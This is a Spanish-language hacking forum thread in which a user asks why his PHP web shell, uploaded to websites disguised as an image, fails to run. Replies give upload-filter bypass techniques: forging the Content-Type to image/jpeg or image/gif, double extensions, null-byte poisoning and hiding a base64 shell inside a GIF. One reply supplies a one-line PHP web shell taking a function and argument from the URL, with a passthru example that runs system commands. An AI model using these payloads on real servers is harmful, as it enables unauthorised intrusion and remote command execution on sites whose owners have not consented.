comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Problema para subir shell

  • 5 Respuestas
  • 1584 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ricky19_77

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Mayo 16, 2015, 01:09:20 am »
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo
« Última modificación: Mayo 16, 2015, 09:56:47 am por Expermicid »

Desconectado S t Ø r M d ∆ r k

  • *
  • Underc0der
  • Mensajes: 74
  • Actividad:
    0%
  • Reputación 0
  • fb.com/cyberoxyde
    • Ver Perfil
    • Mi Blog
    • Email
  • Twitter: @stormdark_
« Respuesta #1 en: Mayo 16, 2015, 02:00:58 am »
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg. Si no se puede intenta bypassear el uploader de otra manera, juega con las extensiones asi file.jpeg.php o file.php.jpeg para q veas como funciona el uploader, puedes intentar tambien un null byte poissoning..

saludos.
You are not allowed to view links. Register or Login
In my mind where before there was order, today there is only chaØs!

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1904
  • Actividad:
    18.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #2 en: Mayo 16, 2015, 08:55:54 am »
Haz como dijo storm, si no, recuerda que no todos los uploaders se pueden bypassear.

Saludos.



Desconectado ricky19_77

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Mayo 16, 2015, 03:16:59 pm »
en realidad no lo probe en un solo uploader por eso decia si estoy haciendo algo mal tambien meti la shell dentro del codigo fuente de un gif y tampoco me dejo es que veo muchos tutoriales y lo unico que hacen es subir la shell y despues le cambian la extension y listo se ejecuta

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 365
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #4 en: Mayo 16, 2015, 06:02:34 pm »
Proba con un gif que no pese mucho, ami me paso de no poder subir por la imagen y cuando la cambie me dejo, agregale el ; al final y metele la shell en base64 con el
Código: PHP
  1. <? You are not allowed to view links. Register or Login(); ?>
obvio , y cuando lo subas editale la cabecera y donde dice Content-Type: le pones image/gif (Recuerda que no todos los uploads son vulnerables!)). Saludos!
« Última modificación: Mayo 17, 2015, 09:49:14 pm por EPSILON »

Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
« Respuesta #5 en: Mayo 17, 2015, 09:43:14 pm »
You are not allowed to view links. Register or Login
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg.
es lo mismo
You are not allowed to view links. Register or Login
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

no todos los uploaders te dejan subir shell
proba con uno que sepas que es vulnerable, lo mas facil es hacerlo en localhost. podes usar este You are not allowed to view links. Register or Login
no se que shell estas usando pero capaz no pasa porque es muy pesada. podes usar <?PHP $_GET['a']($_GET['b']);?> y para ejecutar comandos haces ?a=passthru&b=ls
que error te da?

 

¿Te gustó el post? COMPARTILO!



Crear un archivo .vbs para ejecutar un archivo .bat en invisible

Iniciado por NMS

Respuestas: 2
Vistas: 3609
Último mensaje Marzo 13, 2017, 10:37:57 pm
por sadfud
allegro 5,opngl,sdk para fan game modo storyboard game

Iniciado por Mr.Tru

Respuestas: 2
Vistas: 251
Último mensaje Mayo 23, 2018, 01:19:20 pm
por Mr.Tru
[SOLUCIONADO] Desencriptacion de una imagen para extraer la imagen original

Iniciado por stuxnet13

Respuestas: 3
Vistas: 1143
Último mensaje Enero 07, 2016, 07:55:01 pm
por blackdrake
[SOLUCIONADO] Ayuda para encontrar "airdecrypt"

Iniciado por Typh0n

Respuestas: 2
Vistas: 3771
Último mensaje Enero 13, 2014, 07:11:18 am
por aika
Cómo uso la "/" para hacer un select en una tabla

Iniciado por tetano32

Respuestas: 3
Vistas: 792
Último mensaje Diciembre 20, 2017, 04:41:12 pm
por tetano32